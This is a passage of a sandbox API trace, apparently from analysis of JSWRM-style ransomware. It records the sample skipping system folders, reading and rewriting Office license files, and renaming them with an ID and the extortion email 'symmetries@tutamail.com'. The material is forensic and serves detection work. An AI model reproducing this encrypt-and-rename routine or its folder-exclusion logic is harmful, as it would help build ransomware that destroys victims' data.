lpWideCharStr="ProjectProR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0107.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0107.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.957] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0107.957] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0107.957] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0107.970] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.970] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0107.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.971] CloseHandle (hObject=0x45c) returned 1 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0107.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0107.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0107.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0107.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0107.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0107.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0107.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9624146, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9624146, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe96e2d19, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5172, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail-ppd.xrm-ms", cAlternateFileName="PRD3C3~1.XRM")) returned 1 [0107.972] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0107.972] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0107.972] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0107.972] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0107.972] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.973] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.973] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.973] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.973] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.973] lstrcmpiW (lpString1="ProjectProR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0107.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0107.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.974] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20850) returned 1 [0107.974] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0107.974] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0107.978] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.978] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0107.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.978] CloseHandle (hObject=0x45c) returned 1 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0107.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0107.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0107.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0107.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0107.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0107.979] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9624146, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9624146, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe972f1ab, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail-ul-oob.xrm-ms", cAlternateFileName="PRF9CD~1.XRM")) returned 1 [0107.979] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.980] lstrcmpiW (lpString1="ProjectProR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.981] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0107.981] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0107.981] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0107.985] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.985] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0107.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.986] CloseHandle (hObject=0x45c) returned 1 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0107.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0107.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0107.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0107.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0107.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe95b1b38, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe95b1b38, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe969686e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail-ul-phn.xrm-ms", cAlternateFileName="PRABD2~1.XRM")) returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.988] lstrcmpiW (lpString1="ProjectProR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 